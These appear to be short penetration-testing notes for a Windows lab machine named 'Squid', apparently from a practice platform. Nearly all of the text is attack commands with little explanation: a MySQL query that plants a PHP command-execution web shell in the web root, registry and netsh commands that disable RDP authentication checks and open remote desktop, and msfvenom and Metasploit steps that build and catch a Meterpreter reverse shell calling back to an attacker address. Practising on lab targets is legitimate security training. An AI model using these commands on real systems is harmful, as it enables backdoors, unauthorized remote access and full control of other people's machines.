Squid Machine
SQUID - MACHINE / PG
PG/easy_windows
This machine a proxy named squid that proxy all network traffic from outside . It operate on port 3128
Mysql 3306:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
Disable NLA;
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f
Enable RDP on owned machine:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
Reverse Shell with Meterpreter:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.17 LPORT=4444 --format=exe > evil.exe
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set LHOST 192.168.0.17
msf5> set LPORT 4444
msf5> run